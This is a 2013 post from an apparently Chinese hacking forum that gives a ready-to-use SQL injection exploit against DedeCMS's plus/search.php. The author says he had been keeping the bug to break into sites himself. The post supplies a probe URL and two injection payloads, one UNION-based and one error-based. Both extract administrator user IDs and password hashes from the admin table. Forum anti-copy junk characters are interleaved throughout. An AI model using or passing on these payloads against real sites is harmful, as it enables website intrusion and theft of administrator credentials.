找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2040|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ
7 R, y4 [( p: w$ o/ p/ r* s, X# D% E& K" h9 y) Z  U, I0 _5 A" b
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。/ j4 C. T. G. X
0 @5 P0 V5 ], {8 T
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。1 m# C  R0 o& M. y' _5 L- Q. [

9 b; o' ?+ c- P2 g- n我一般是这样测试的:
1 D2 h0 Y, g# _# m4 T
9 Y3 G/ z) P; m9 k, S提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a9 Z6 `& m) h6 t; j
0 p$ d& Z% _7 _+ b0 H
转载不加作者名的没JJ4 o3 j8 G/ H* }4 ^( s/ |
: I9 k3 t! o7 [, o
作者:鬼哥' \! h! d8 w$ Q4 [" |- Z5 m7 H
! t; w- }  Q$ z+ M9 S

0 ~3 ~2 g% {" i, x( r6 U2 y8 S7 A
0 C4 ~' w( n' f9 U/ C看结果如果提示
) J" }$ U$ {3 d6 r
) @* m; M; H' l- ~# [Safe Alert: Request Error step 2 !9 f1 W' f& L3 g) e1 M
0 ]2 n6 ~, d9 n0 j& |9 B1 }4 R, f
那么直接用下面的exp1 Y5 D2 ?% E# z* I$ p- r

8 h6 c% @% ?% T5 s6 G6 \xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a! @% L0 h1 ^' B' g

: Q6 \# Z+ G# T/ P& g- I! O& @+ \* M1 d0 U* w/ w4 g, K
看结果如果提示- J( d; L$ c& m6 t
8 N4 R) y, V) _6 y
Safe Alert: Request Error step 1 !
$ a# t  C0 q7 x) @5 |: k7 _+ Q& m
8 A9 Y6 Y3 o! C. m那么直接用下面的exp
, [) S5 Q, W. W, |, [% A( h/ G' K3 v2 z. `
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
( a: {' B3 a3 J$ }' v9 ^
/ K: Q" D' F9 D7 }+ `) o* E. Q
! K& S5 t) Z9 N- Z& l( |如果正常显示证明漏洞不存在了。
% l$ }2 F& J$ }$ d5 B8 A8 |) y4 ?0 {; @* Y, c& I! w
转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表